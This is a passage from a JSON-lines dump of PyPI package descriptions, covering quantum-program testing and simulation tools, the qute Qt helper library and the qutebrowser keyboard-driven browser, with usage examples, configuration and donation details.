In 2022 IEEE/ACM 44th International Conference on Software Engineering: Companion Proceedings (ICSE-Companion) [doi]"} +{"package": "qusbt-gpu", "pacakge-description": "QuSBT: Search-Based Testing of Quantum ProgramsDescriptionGenerating a test suite for a quantum program such that it has the maximum number of failing tests is an optimization problem. For such optimization, search-based testing has shown promising results in the context of classical programs. To this end, we present a test generation tool for quantum programs based on a genetic algorithm, called QuSBT (Search-based Testing of Quantum Programs). QuSBT automates the testing of quantum programs, with the aim of finding a test suite having the maximum number of failing test cases. QuSBT utilizes IBM's Qiskit as the simulation framework for quantum programs. We present the tool architecture in addition to the implemented methodology (i.e., the encoding of the search individual, the definition of the fitness function expressing the search problem, and the test assessment w.r.t. two types of failures). Finally, we report results of the experiments in which we tested a set of faulty quantum programs with QuSBT to assess its effectiveness.How to use QuSBT?Quantum Program FileThe quantum program should be written with Qiskit.The code has to be structured in a function named as 'run' with one parameter that refers to the quantum circuit.Users only need to add gates to the circuit and measure output qubits to get the output. They don't need to set any register, initialize circuits, choose the simulation, or execute the circuits in 'run' function.Program SpecificationFor each input, there should be one or more than one outputs. The probability of occurrence of one output can be shown as a decimal with binary numbers of input-output pair, and the input and the output are separated by a comma.Here is one simple example:00,1=0.5\n00,0=0.5\n01,1=0.5\n01,0=0.5Specially, the dash symbol '-' represents both '0' and '1' for inputs and outputs, which means the example above can be expressed as below:0-,-=0.5Configuration FileThe configuration file should be written in an INI file.\nThe configuration file is described below.[program]\nroot=\n;(Required)\n;Description: The absolute root of your quantum program file.\nnum_qubit=\n;(Required)\n;Description: The total number of qubit of your quantum program.\ninputID=\n;(Required)\n;Description: The IDs of input qubits.\n;Format: A non-repeating sequence separated by commas.\noutputID=\n;(Required)\n;Description: The IDs of output qubits which are the qubits to be measured.\n;Format: A non-repeating sequence separated by commas.\n\n\n[qusbt_configuration]\nbeta=\n;(Optional)\n;Description: The percentage of possible inputs as the number of test cases in a test suite.\nM=\n;(Optional)\n;Description: The number of test cases in a test suite.\n;Attention: You should use either 'beta' or 'M'. 
We use 'beta' as 0.05 by default.\n\n\n[GA_parameter]\npopulation_size=\n;(Optional)\n;Description: The population size in GA, population_size=10 by default.\noffspring_population_size=\n;(Optional)\n;Description: The offspring population size in GA, offspring_population_size=10 by default.\nmax_evaluations=\n;(Optional)\n;Description: The maximum evaluations in GA, max_evaluations=500 by default.\nmutation_probability=\n;(Optional)\n;Description: mutation probability in GA, mutation_probability=1.0/M, 'M' is the size of a test suite by default.\nmutation_distribution_index=\n;(Optional)\n;Description: mutation distribution in GA, mutation_distribution_index=20 by default.\ncrossover_probability=\n;(Optional)\n;Description: crossover probability in GA, crossover_probability=0.9 by default.\ncrossover_distribution_index=\n;(Optional)\n;Description: crossover probability in GA, crossover_distribution_index=20 by default.\n\n\n[program_specification]\n;Description: The program specification.\n;Format:input string (binary),output string (binary)=probability\n;Example:\n;00,1=0.5\n;00,0=0.5\n;01,1=0.5\n;01,0=0.5\n;or\n;0-,-=0.5\n;Attention: '-' can refer to both '0' and '1'.Command Line OperationYou can provide the root of the configuration file and run QuSBT.from qusbt.qusbt_search import qusbt\n\nqusbt(\"configuration.ini\")QuSBT will assess the results according to the two test oracles that have been proposed inthis paper:uof: Whether an observed output is correct according to program specification. If not, the program is failed;wodf: If all the observed outputs corresponding to an input are valid, then it compares their observed probabilities with the ones specified in the Program Specification file. If the differences are statistically significant (i.e., a p-value lower than the chosen significance level), the program is failed.After running, you get one Excel file containing solution and iteration informationVideo DemonstrationA video demo is availablehere.Experimental DataExperimental data including quantum programs, and program specifications can be downloadedhere.ExtensionOne can checkout the code from GitHub and provide extensions to QuSBT.PaperX. Wang, P. Arcaini, T. Yue, S. Ali. QuSBT: Search-Based Testing of Quantum Programs. 
In 2022 IEEE/ACM 44th International Conference on Software Engineering: Companion Proceedings (ICSE-Companion) [doi]"} +{"package": "qushiqyukla", "pacakge-description": "No description available on PyPI."} +{"package": "qusi", "pacakge-description": "qusi (formerly RAMjET)qusiis a framework for producing neural networks to characterize phenomena in astrophysical photometric data.See here for documentation."} +{"package": "qusimulator", "pacakge-description": "Qusimulator \u2013 A quantum computing simulatorRelease 2.2$ pip install qusimulatorNow full support for quantum noise simulation.Includes state-vector and density-matrix based simulators.Documentation and example code resources -Example implementations of various quantum algorithmsDeveloper documentation"} +{"package": "qusource", "pacakge-description": "QusourceQuantum circuit simulator"} +{"package": "quspin-qite", "pacakge-description": "QITE_CDQITE inspired cd drivingusageimportquspinimportquspin_qiterun the codecdexamples/QITEpythonrun_qite.py# python run_vqite.pyacknowledgeThe implementation is adapted fromhttps://github.com/mariomotta/QITE/blob/master/code_v4/qite.pyandhttps://github.com/Plmono/RL-qite/blob/main/gym_cut/envs/foo_env.py#L84-L142"} +{"package": "quspin-vqa", "pacakge-description": "VQAGeneral purpose variational quantum algorithmsIntroductionVQA tries to unify the variational quantum algorithms and provide a scalable solution to develop VQA.InstallInstall the latest version of the package.$pipinstallquspin_vqaor install locally$pipinstall-e.Before installing this package, make surequspinis installed. Check out the detailed installationherecondainstall-cweinbe58quspinUsageimportquspinimportvqarun the code / examples$cdexamples/QAOA\n$pythonrun.py"} +{"package": "qustop", "pacakge-description": "QUSTOPNOTE: Thequstoppackage is still under development.Thequstop(QUantum STate OPtimizer) package is a Python toolkit for studying\nvarious quantum state optimization scenarios including calculating optimal\nvalues for quantum state distinguishability, quantum state exclusion, quantum\nstate cloning, and more.ApplicationsThequstoppackage can be used to:Calculate and approximate optimal probabilities of distinguishing quantum\nstates over positive, PPT, and separable measurements with either minimum-error\nor unambiguously.Calculate and approximate optimal probabilities of excluding quantum states\nwith either minimum-error or unambiguously.InstallationSee theinstallation guide.UsageSee thedocumentation.ExamplesFor more examples, please consultqustop/examplesas well as thequstopintroductory\ntutorial.Quantum state distinguishabilityFurther examples on quantum state distinguishability can be found in thequstop/examples/opt_distdirectory.Consider the following Bell states:We will be using these states to consider a number of applications in the realm\nof quantum state distinguishability.Distinguishing two orthogonal statesA result ofarXiv:0007098states that\nany two orthogonal pure states can be distinguished perfectly by LOCC\nmeasurements.
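(For reference: the Bell-state definitions in the original qustop README are images and do not survive in this text. The four standard Bell states used throughout these examples are
|\phi_\pm\rangle = (|00\rangle \pm |11\rangle)/\sqrt{2}, \qquad |\psi_\pm\rangle = (|01\rangle \pm |10\rangle)/\sqrt{2};
which of these corresponds to which index of toqito's bell() follows toqito's own convention and is not stated here.)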
As the optimal probability of distinguishing via LOCC\nmeasurements is a lower bound on positive, PPT, separable, etc., we should\nexpect to also see a value of1to indicate perfect probability of\ndistinguishing.fromtoqito.statesimportbellfromqustopimportState,Ensemble,OptDistdims=[2,2]states=[State(bell(0)*bell(0).conj().T,dims),State(bell(1)*bell(1).conj().T,dims)]probs=[1/2,1/2]ensemble=Ensemble(states,probs)sep_res=OptDist(ensemble,\"sep\",\"min-error\")sep_res.solve()ppt_res=OptDist(ensemble,\"ppt\",\"min-error\")ppt_res.solve()pos_res=OptDist(ensemble,\"pos\",\"min-error\")pos_res.solve()Checking the respective values of the solved instances, we see that all of the\nvalues are equal to one, which indicate that the two pure states are indeed\nperfectly distinguishable under PPT, separable, and positive measurements.>>>print(pos_res.value)0.9999999999384911>>>print(ppt_res.value)1.0000000047560667>>>print(sep_res.value)0.9999999995278338Four indistinguishable orthogonal maximally entangled statesIt was shown inarXiv:1205.1031and later\nextended inarXiv:1307.3232that for the\nfollowing set of statesthat the optimal probability of distinguishing via a PPT measurement should\nyield an optimal probability of 7/8.importnumpyasnpfromtoqito.statesimportbellfromqustopimportState,Ensemble,OptDistdims=[2,2,2,2]rho_0=np.kron(bell(0),bell(0))*np.kron(bell(0),bell(0)).conj().Trho_1=np.kron(bell(2),bell(1))*np.kron(bell(2),bell(1)).conj().Trho_2=np.kron(bell(3),bell(1))*np.kron(bell(3),bell(1)).conj().Trho_3=np.kron(bell(1),bell(1))*np.kron(bell(1),bell(1)).conj().Tensemble=Ensemble([State(rho_0,dims),State(rho_1,dims),State(rho_2,dims),State(rho_3,dims)])sd=OptDist(ensemble,\"ppt\",\"min-error\")sd.solve()Indeed the optimal value obtained viaqustopis equal to 7/8:# 7/8 \\approx 0.875>>>print(sd.value)0.8749769201568257It was also shown inarXiv:1205.1031that the optimal\nprobability of distinguishing amongst these same state unambiguously via PPT measurements was\nequal to 3/4.sd=OptDist(ensemble,\"ppt\",\"unambiguous\")sd.solve()# 3/4 = 0.75>>>print(sd.value)0.749999999939434Entanglement cost of distinguishing Bell statesOne may ask whether the ability to distinguish a state can be improved by\nmaking use of an auxiliary resource state.,for some \u03b5 in [0, 1].It was shown inarXiv:1408.6981that the\nprobability of distinguishing four Bell states with a resource state via PPT\nmeasurements or separable measurements is given by the closed-form expressionwhere the ensemble is defined asUsingqustop, we may encode this scenario as follows.importnumpyasnpfromtoqito.statesimportbasis,bellfromqustopimportState,Ensemble,OptDiste_0,e_1=basis(2,0),basis(2,1)eps=0.5tau=np.sqrt((1+eps)/2)*np.kron(e_0,e_0)+np.sqrt((1-eps)/2)*np.kron(e_1,e_1)dims=[2,2,2,2]states=[State(np.kron(bell(0),tau),dims),State(np.kron(bell(1),tau),dims),State(np.kron(bell(2),tau),dims),State(np.kron(bell(3),tau),dims),]probs=[1/4,1/4,1/4,1/4]ensemble=Ensemble(states,probs)sep_res=OptDist(ensemble,\"sep\",\"min-error\")sep_res.solve()ppt_res=OptDist(ensemble,\"ppt\",\"min-error\")ppt_res.solve()eq=1/2*(1+np.sqrt(1-eps**2))Note that when we print out the optimal values for both separable and PPT\nmeasurements that the values obtained agree with the closed form expression.>>>print(eq)0.9330127018922193>>>print(ppt_res.value)0.933010488554166>>>print(sep_res.value)0.9330124607534689It was also shown inarXiv:1408.6981that\nthe closed-form probability of distinguishing three Bell states with a resource\nstate using separable measurements to 
be given by the closed-form expression:where the ensemble is defined asUsingqustop, we may encode this scenario as follows.importnumpyasnpfromtoqito.statesimportbasis,bellfromqustopimportState,Ensemble,OptDiste_0,e_1=basis(2,0),basis(2,1)eps=0.5tau=np.sqrt((1+eps)/2)*np.kron(e_0,e_0)+np.sqrt((1-eps)/2)*np.kron(e_1,e_1)dims=[2,2,2,2]states=[State(np.kron(bell(0),tau),dims),State(np.kron(bell(1),tau),dims),State(np.kron(bell(2),tau),dims),]probs=[1/3,1/3,1/3]ensemble=Ensemble(states,probs)sep_res=OptDist(ensemble,\"sep\",\"min-error\",level=2)sep_res.solve()eq=1/3*(2+np.sqrt(1-eps**2))Pritning the values of both the closed-form equation and the value obtained via\nthe SDP, we obtain:>>>print(sep_res.value)0.9583057987150858>>>print(eq)0.9553418012614794Note that the value ofsep_res.valueis actually a bit higher thaneq. This\nis because the separable value is calculated by a hierarchy of SDPs. At low\nlevels of the SDP, the problem can often converge to the optimal value, but\nother times it is necessary to compute higher levels of the SDP to eventually\narrive at the optimal value. While this is intractable in general, in practice,\nthe SDP can often converge or at least get fairly close to the optimal value\nfor small problem sizes.Werner hiding pairsInarXiv:0011042andarXiv:0103098a quantum data hiding\nprotocol that encodes a classical bit in a Werner hiding pair was provided.A Werner hiding pair is defined aswhereis the swap operator defined for some dimension n >= 2.It was show inhdl:10012/9572thatwhere the ensemble is defined asUsingqustop, we may encode this scenario as follows.importnumpyasnpfromtoqito.permsimportswap_operatorfromqustopimportEnsemble,State,OptDistdim=2sigma_0=(np.kron(np.identity(dim),np.identity(dim))+swap_operator(dim))/(dim*(dim+1))sigma_1=(np.kron(np.identity(dim),np.identity(dim))-swap_operator(dim))/(dim*(dim-1))states=[State(sigma_0,[2,2]),State(sigma_1,[2,2])]ensemble=Ensemble(states)expected_val=1/2+1/(dim+1)sd=OptDist(ensemble=ensemble,dist_measurement=\"ppt\",dist_method=\"min-error\",eps=1e-8)sd.solve()We can verify that the closed-form expression matches that of the value\nreturned fromqustop.print(sd.value)0.8333333333668715print(expected_val)0.8333333333333333State exclusionThe primary difference between the quantum state distinguishability\nscenario and the quantum state exclusion scenario is that in the former,\nBob want to guess which state he was given, and in the latter, Bob wants to\nguess which state he wasnotgiven.State cloning(Coming soon).LicenseGNU GPL v.3.0."} +{"package": "quta", "pacakge-description": "qutaQuadratically optimizedThrustAllocationquta is an open source python package leveraging the optimization technique quadratic programming for allocation of thrust to thrusters fixed on a body in the plane (3DOFs).Example usage:from quta.thruster import AzimuthThruster\nfrom quta.allocator import MinimizePowerAllocator\n\naz1 = AzimuthThruster((-20, 5), 10000, 32)\naz2 = AzimuthThruster((-20, -5), 10000, 32)\n\na = MinimizePowerAllocator()\n\na.add_thruster(az1)\na.add_thruster(az2)\n\nu, res = a.allocate([0, 500, 8000], relax=False)ToDoUpdate readmeDocumentation/examplesContributions welcome through pull requests!"} +{"package": "quTARANG", "pacakge-description": "quTARANGWelcome to quTARANG, a fast GPU enabled python solver to solve Gross-Pitaeskii equation.Capablities ofquTARANGIt is a solver developed to study turbulence in quantum systems specially in Bose-Einstein condensates. 
It can run on both GPU and CPU.The documentation of the code is available atquTARANG.DependenciesquTARANGdepends on the following packages:numpycupy(If you want to use GPU)pathlibh5pymatplotlibInstallationYou can installquTARANGusingpippipinstallquTARANGHow to use:To run a simulation:Import the required librariesfromquTARANGimportxp,Params,GPESet the parametersCreate an instance of theParamsclass and set the parameters according to your need.\nThe parameters have been detailed in the documentation. Example:# Create an instance of the Params class for storing parameters.par=Params(N=[64,64,64],L=[16,16,16],g=0.1,dt=0.001,tmax=5,rms=[True,0,100])InitiateGPEclass\nCreate an instance of the GPE class by passing the Params instance created previously.# Create an instance of the GPE class.G=GPE(par)Set initial conditionYou can give the initial condition in terms of the wavefunction and potential by defining their functions and passing them to the functionset_init.
Use# -- qute to slim the layout - removing marginsself.setLayout(qute.utilities.layouts.slimify(qute.QVBoxLayout()))# -- Create some widgetsself.spinner=qute.QSpinBox()self.checker=qute.QCheckBox()# -- Add these to our layoutself.layout().addWidget(self.spinner)self.layout().addWidget(self.checker)# -- Finally lets connect some signals and slots without# -- caring what it isqute.connectBlind(self.spinner,self.do_something)qute.connectBlind(self.checker,self.do_something)defdo_something(self,*args,**kwargs):print('doing something...')if__name__=='__main__':# -- Use qute to get or create the QApplication instanceq_app=qute.utilities.qApp()widget=MyWidget()widget.show()q_app.exec_()In this example we see some of the features of qute in use, but most importantly is that it is usable in environments using either PyQt, PySide or PySide2 (thanks to Qt.py), and then utilises the various helper functionality defined within qute which you can read about below.Cross Application SupportThis library is specifically intended for use when in environments where\nyou're actively trying to share/develop tools across multiple applications\nwhich support PyQt, PySide or PySide2.The premise is that you can request the main application window using\na common function regardless of the actual application - making it trivial\nto implement a tool which works in multiple host applications without any\nbespoke code.The current list of supported applications are:* Native Python\n* Maya\n* 3dsmax\n* Motion BuilderHere is an example:importquteclassMyCrossApplicationTool(qute.QWidget):def__init__(self,parent=None):super(MyCrossApplicationTool,self).__init__(parent=parent)self.setLayout(qute.QVBoxLayout())self.layout().addWidget(qute.QLabel('This tool will launch and parent under Max, Maya, Motion Builder or Pure Python'))# ------------------------------------------------------------------------------deflaunch(blocking=False,*args,**kwargs):# -- This will return the running QApplication instance, or create# -- one if one is not presentq_app=qute.qApp()# -- Create a window and set its parent 'blindly' to what qute# -- resolves as the main window.window=qute.QMainWindow(parent=qute.utilities.windows.mainWindow())# -- Assign our widget to the windowwindow.setCentralWidget(MyCrossApplicationTool(*args,**kwargs))window.show()ifblocking:q_app.exec_()launch()In the example above, we have a (somewhat simple!) tool, and we expose the\ntool through a launch function which is creating a main window. The crucial\npart is that the window is asking Qute to return the main application window\nrather than you relying on an application specific Ui.In doing this, you can copy/paste the code from the example into Max, Maya or\nMotion Builder and you will get the same widget, and that widget will be\ncorrectly parented under that application, making your Ui incredibly portably\nand re-usable without an application specific layer.StylingQute gives a convience function for applying stylesheets to Qt widgets. Crucually it also exposes a mechanism allowing you do define variables to be replaced within stylesheets. 
This helps when wanting to use the same values multiple times across a stylesheet.For example, if we have a stylesheet such as:QWidget{background-color:rgb(BG_COLOR);color:rgb(TEXT_COLOR);}QLabel{padding-top:7px;padding-bottom:7px;background-color:transparent;color:rgb(TEXT_COLOR);}This can be assigned to a widget using:importqutequte.utilities.styling.apply(css_str,apply_to=widget,BG_COLOR='50, 50, 50',TEXT_COLOR='255, 0, 0',)In this example we pass a CSS string and the widget we want to apply to. Any additional keywords will be used as search and replace elements. This is handy when wanting to change sections of your stylesheet easily. Your replacements can be numbers, strings or filepaths (just ensure your slashing is / and not \\). Thespaceexample stylesheet demonstrates this by using png files for widget backgrounds.Equally, you can pass the full path to a css/qss file too:qute.utilities.styling.apply('/usr/styles/my_style.qss',widget,)Alternatively you can have a library of style sheets and set the environment variableQUTE_STYLE_PATHto that location. By doing this you can pass the name of the style rather than the absolute path. Qute comes with one example stylesheet calledspacewhich can be used to demonstrate this as below:qute.utilities.styling.apply('space',widget,)This is an example of the space stylesheet:Menu GenerationGenerating menu's can be tedious and involve a lot of repetative code. In many cases a menu is made up of either actions, sseperators or sub-menus.Each of these are supported by the menu generation functionqute.utilities.menus.menuFromDictionary. The format of the dictionary you provide must conform to:{'Label': function}or{'Label': dict}or{'Label': None}If a function is given then the function is set as the callable when the item is clicked. If a dictionary is given as the value a submenu is generated (this is recusive, so you can nest menus). If the value is None then a Seperator will be added regardless of the key.Here is an example:importqutedeffoo():print('calling foo')defbar():print('calling bar')menu_definition={'Foo':foo,'-':None,'More':dict(bar=bar)}menu=qute.utilities.menus.menuFromDictionary(menu_definition)In this example we define some functions and add them as keys, we can then generate a QMenu from that dictionary. This is especially useful when you're dynamically generating menu from variable data.You can also define icons for your menu. To utilise this mechanism your icons must have the same name as the label and end in .png. You can then define the path to the icons during the menu call as shown here:menu=qute.utilities.menus.menuFromDictionary(structure=menu_definition,icon_paths=[os.path.dirname(__file__),])DeriveDerive is all about dynamically generating ui elements based on data types and being able to extract values from widgets without having to know what they are. This is particularly useful when generating ui elements on the fly without knowing what they are up front.A good example of this is the exposure of options or attributes on a class without knowing exactly what those options are. 
We can see an example of that here:importquteclassNode:\"\"\"Define a base class for something\"\"\"def__init__(self):self.options=dict()classCircle(Node):def__init__(self):self.options['radius']=5self.options['closed']=TrueclassQuadtrilateral(Node):def__init__(self):self.options['force_rectangle']defexample_callback(*args,**kwargs):print('In Callback')nodes=[Circle(),Quadtrilateral(),Quadtrilateral(),Circle(),]fornodeinnodes:foroption,valueinnode.options:# -- Blindly create a widget to represent the widgetwidget=qute.utilities.derive.deriveWidget(value=value,label=option,)# -- Connect the change event of the widget# -- to our callback - without knowing what# -- the widget is or what to connectqute.utilities.derive.connectBlind(widget,example_callback)We can also ask for the value from a widget without knowing what the widget is. This can be done using:importqutevalue=qute.utilities.derive.deriveValue(widget)This mechanism makes it easier to create dynamic ui's, especially when you're trying to expose data which can be manipulated on code objects.CompatabilityThis has been tested under Python 2.7.13 and Python 3.6.6 under both Windows and Ubuntu.ContributeIf you would like to contribute thoughts, ideas, fixes or features please get in touch!mike@twisted.space"} +{"package": "qutebrowser", "pacakge-description": "// SPDX-License-Identifier: GPL-3.0-or-later// If you are reading this in plaintext or on PyPi://// A rendered version is available at:// https://github.com/qutebrowser/qutebrowser/blob/main/README.asciidocqutebrowser===========// QUTE_WEB_HIDEimage:qutebrowser/icons/qutebrowser-64x64.png[qutebrowser logo] *A keyboard-driven, vim-like browser based on Python and Qt.*image:https://github.com/qutebrowser/qutebrowser/workflows/CI/badge.svg[\"Build Status\", link=\"https://github.com/qutebrowser/qutebrowser/actions?query=workflow%3ACI\"]image:https://codecov.io/github/qutebrowser/qutebrowser/coverage.svg?branch=main[\"coverage badge\",link=\"https://codecov.io/github/qutebrowser/qutebrowser?branch=main\"]link:https://www.qutebrowser.org[website] | link:https://blog.qutebrowser.org[blog] | https://github.com/qutebrowser/qutebrowser/blob/main/doc/faq.asciidoc[FAQ] | https://www.qutebrowser.org/doc/contributing.html[contributing] | link:https://github.com/qutebrowser/qutebrowser/releases[releases] | https://github.com/qutebrowser/qutebrowser/blob/main/doc/install.asciidoc[installing]// QUTE_WEB_HIDE_ENDqutebrowser is a keyboard-focused browser with a minimal GUI. It's basedon Python and Qt and free software, licensed under the GPL.It was inspired by other browsers/addons like dwb and Vimperator/Pentadactyl.// QUTE_WEB_HIDE**qutebrowser's primary maintainer, The-Compiler, is currently workingpart-time on qutebrowser, funded by donations.** To sustain this for a longtime, your help is needed! See thehttps://github.com/sponsors/The-Compiler/[GitHub Sponsors page] orhttps://github.com/qutebrowser/qutebrowser/blob/main/README.asciidoc#donating[alternative donation methods]for more information. 
Depending on your sign-up date and howlong you keep a certain level, you can get qutebrowser t-shirts, stickers andmore!// QUTE_WEB_HIDE_ENDScreenshots-----------image:doc/img/main.png[\"screenshot 1\",width=300,link=\"doc/img/main.png\"]image:doc/img/downloads.png[\"screenshot 2\",width=300,link=\"doc/img/downloads.png\"]image:doc/img/completion.png[\"screenshot 3\",width=300,link=\"doc/img/completion.png\"]image:doc/img/hints.png[\"screenshot 4\",width=300,link=\"doc/img/hints.png\"]Downloads---------See the https://github.com/qutebrowser/qutebrowser/releases[github releasespage] for available downloads and the link:doc/install.asciidoc[INSTALL] file fordetailed instructions on how to get qutebrowser running on various platforms.Documentation and getting help------------------------------Please see the link:doc/help/index.asciidoc[help page] for available documentationpages and support channels.Contributions / Bugs--------------------You want to contribute to qutebrowser? Awesome! Please readlink:doc/contributing.asciidoc[the contribution guidelines] for details anduseful hints.If you found a bug or have a feature request, you can report it in severalways:* Use the built-in `:report` command or the automatic crash dialog.* Open an issue in the Github issue tracker.* Write a mail to thehttps://listi.jpberlin.de/mailman/listinfo/qutebrowser[mailinglist] atmailto:qutebrowser@lists.qutebrowser.org[].Please report security bugs to security@qutebrowser.org(or if GPG encryption is desired, contact me@the-compiler.org with GPG IDhttps://www.the-compiler.org/pubkey.asc[0x916EB0C8FD55A072]).Alternatively,https://github.com/qutebrowser/qutebrowser/security/advisories/new[report a vulnerability]via GitHub'shttps://docs.github.com/en/code-security/security-advisories/guidance-on-reporting-and-writing/privately-reporting-a-security-vulnerability[private reporting feature].Requirements------------The following software and libraries are required to run qutebrowser:* https://www.python.org/[Python] 3.8 or newer* https://www.qt.io/[Qt], either 6.2.0 or newer, or 5.15.0 or newer, with the following modules:- QtCore / qtbase- QtQuick (part of qtbase or qtdeclarative in some distributions)- QtSQL (part of qtbase in some distributions)- QtDBus (part of qtbase in some distributions; note that a connection to DBus atruntime is optional)- QtOpenGL- QtWebEngine (if using Qt 5, 5.15.2 or newer), or- alternatively QtWebKit (5.212) - **This is not recommended** due to known securityissues in QtWebKit, you most likely want to use qutebrowser with thedefault QtWebEngine backend (based on Chromium) instead. Quoting thehttps://github.com/qtwebkit/qtwebkit/releases[QtWebKit releases page]:_[The latest QtWebKit] release is based on [an] old WebKit revision with knownunpatched vulnerabilities. 
Please use it carefully and avoid visiting untrustedwebsites and using it for transmission of sensitive data._* https://www.riverbankcomputing.com/software/pyqt/intro[PyQt] 6.2.2 or newer(Qt 6) or 5.15.0 or newer (Qt 5)* https://palletsprojects.com/p/jinja/[jinja2]* https://github.com/yaml/pyyaml[PyYAML]On Python 3.8, the following backport is also required:* https://importlib-resources.readthedocs.io/[importlib_resources]On macOS, the following libraries are also required:* https://pyobjc.readthedocs.io/en/latest/[pyobjc-core and pyobjc-framework-Cocoa]The following libraries are optional:* https://pypi.org/project/adblock/[adblock] (for improved adblocking using ABP syntax)* https://pygments.org/[pygments] for syntax highlighting with `:view-source`on QtWebKit, or when using `:view-source --pygments` with the (default)QtWebEngine backend.* On Windows, https://pypi.python.org/pypi/colorama/[colorama] for colored logoutput.* https://asciidoc.org/[asciidoc] to generate the documentation for the `:help`command, when using the git repository (rather than a release).See link:doc/install.asciidoc[the documentation] for directions on how toinstall qutebrowser and its dependencies.Donating--------**qutebrowser's primary maintainer, The-Compiler, is currently workingpart-time on qutebrowser, funded by donations.** To sustain this for a longtime, your help is needed! See thehttps://github.com/sponsors/The-Compiler/[GitHub Sponsors page] for moreinformation. Depending on your sign-up date and how long you keep a certainlevel, you can get qutebrowser t-shirts, stickers and more!GitHub Sponsors allows for one-time donations (using the buttons next to \"Select atier\") as well as custom amounts. **For currencies other than Euro or Swiss Francs, thisis the preferred donation method.** GitHub uses https://stripe.com/[Stripe] to acceptpayment via credit carts without any fees. Billing via PayPal is available as well, withless fees than a direct PayPal transaction.Alternatively, the following donation methods are available -- note thateligibility for swag (shirts/stickers/etc.) is handled on a case-by-case basisfor those, please mailto:mail@qutebrowser.org[get in touch] for details.* https://liberapay.com/The-Compiler[Liberapay], which can handle paymentsvia Credit Card, SEPA bank transfers, or Paypal. 
Payment fees are paid by me,but they are https://liberapay.com/about/faq#fees[relatively low].* SEPA bank transfer inside Europe (**no fees**):- Account holder: Florian Bruhin- Country: Switzerland- IBAN (EUR): CH13 0900 0000 9160 4094 6- IBAN (other): CH80 0900 0000 8711 8587 3- Bank: PostFinance AG, Mingerstrasse 20, 3030 Bern, Switzerland (BIC: POFICHBEXXX)- If you need any other information: Contact me at mail@qutebrowser.org.- If possible, **please consider yearly or semi-yearly donations**, becauseof the additional overhead from many individual transactions forbookkeeping/tax purposes.* PayPal:https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=me%40the-compiler.org&item_name=qutebrowser¤cy_code=CHF&source=url[CHF],https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=me%40the-compiler.org&item_name=qutebrowser¤cy_code=EUR&source=url[EUR],https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=me%40the-compiler.org&item_name=qutebrowser¤cy_code=USD&source=url[USD].**Note: Fees can be very high (around 5-40%, depending on the donated amounts)** - considerusing GitHub Sponsors (credit card), Liberapay (credit cards, PayPal, or banktransfer) or SEPA bank transfers instead.* Cryptocurrencies:- Bitcoin: link:bitcoin:bc1q3ptyw8hxrcfz6ucfgmglphfvhqpy8xr6k25p00[bc1q3ptyw8hxrcfz6ucfgmglphfvhqpy8xr6k25p00]- Bitcoin Cash: link:bitcoincash:1BnxUbnJ5MrEPeh5nuUMx83tbiRAvqJV3N[1BnxUbnJ5MrEPeh5nuUMx83tbiRAvqJV3N]- Ethereum: link:ethereum:0x10c2425856F7a8799EBCaac4943026803b1089c6[0x10c2425856F7a8799EBCaac4943026803b1089c6]- Litecoin: link:litecoin:MDt3YQciuCh6QyFmr8TiWNxB94PVzbnPm2[MDt3YQciuCh6QyFmr8TiWNxB94PVzbnPm2]- Others: Please mailto:mail@qutebrowser.org[get in touch], I'd happily set up anything link:https://www.ledger.com/supported-crypto-assets[supported by Ledger Live]Sponsors--------Thanks a lot to https://www.macstadium.com/[MacStadium] for supportingqutebrowser with a free hosted Mac Mini via theirhttps://www.macstadium.com/opensource[Open Source Project].(They don't require including this here - I've just been very happy with theiroffer, and without them, no macOS releases or tests would exist)Thanks to the https://www.hsr.ch/[HSR Hochschule f\u00fcr Technik Rapperswil], whichmade it possible to work on qutebrowser extensions as a student research project.image:doc/img/sponsors/macstadium.png[\"powered by MacStadium\",width=200,link=\"https://www.macstadium.com/\"]image:doc/img/sponsors/hsr.png[\"HSR Hochschule f\u00fcr Technik Rapperswil\",link=\"https://www.hsr.ch/\"]Authors-------qutebrowser's primary author is Florian Bruhin (The Compiler), but qutebrowserwouldn't be what it is without the help ofhttps://github.com/qutebrowser/qutebrowser/graphs/contributors[hundreds of contributors]!Additionally, the following people have contributed graphics:* Jad/link:https://yelostudio.com[yelo] (new icon)* WOFall (original icon)* regines (key binding cheatsheet)Also, thanks to everyone who contributed to one of qutebrowser'slink:doc/backers.asciidoc[crowdfunding campaigns]!Similar projects----------------Various projects with a similar goal like qutebrowser exist.Many of them were inspirations for qutebrowser in some way, thanks for that!Active~~~~~~* https://fanglingsu.github.io/vimb/[vimb] (C, GTK+ with WebKit2)* https://luakit.github.io/[luakit] (C/Lua, GTK+ with WebKit2)* https://nyxt.atlas.engineer/[Nyxt browser] (formerly \"Next browser\", Lisp, Emacs-like but also offers Vim bindings, QtWebEngine or GTK+/WebKit2 - note there was a 
https://jgkamat.gitlab.io/blog/next-rce.html[critical remote code execution in 2019] which was handled quite badly)* https://vieb.dev/[Vieb] (JavaScript, Electron)* https://surf.suckless.org/[surf] (C, GTK+ with WebKit1/WebKit2)* https://github.com/jun7/wyeb[wyeb] (C, GTK+ with WebKit2)* Chrome/Chromium addons:https://vimium.github.io/[Vimium]* Firefox addons (based on WebExtensions):https://tridactyl.xyz/[Tridactyl],https://addons.mozilla.org/en-GB/firefox/addon/vimium-ff/[Vimium-FF]* Addons for Firefox and Chrome:https://github.com/brookhong/Surfingkeys[Surfingkeys] (https://github.com/brookhong/Surfingkeys/issues/1796[somewhat sketchy]...),https://lydell.github.io/LinkHints/[Link Hints] (hinting only),https://github.com/ueokande/vimmatic[Vimmatic]Inactive~~~~~~~~* https://bitbucket.org/portix/dwb[dwb] (C, GTK+ with WebKit1,https://bitbucket.org/portix/dwb/pull-requests/22/several-cleanups-to-increase-portability/diff[unmaintained] -main inspiration for qutebrowser)* https://github.com/parkouss/webmacs/[webmacs] (Python, Emacs-like withQtWebEngine, https://github.com/parkouss/webmacs/issues/137[unmaintained])* https://sourceforge.net/p/vimprobable/wiki/Home/[vimprobable] (C, GTK+ withWebKit1)* https://pwmt.org/projects/jumanji/[jumanji] (C, GTK+ with WebKit1)* http://conkeror.org/[conkeror] (Javascript, Emacs-like, XULRunner/Gecko)* https://www.uzbl.org/[uzbl] (C, GTK+ with WebKit1/WebKit2)* https://github.com/conformal/xombrero[xombrero] (C, GTK+ with WebKit1)* https://github.com/linkdd/cream-browser[Cream Browser] (C, GTK+ with WebKit1)* Firefox addons (not based on WebExtensions or no recent 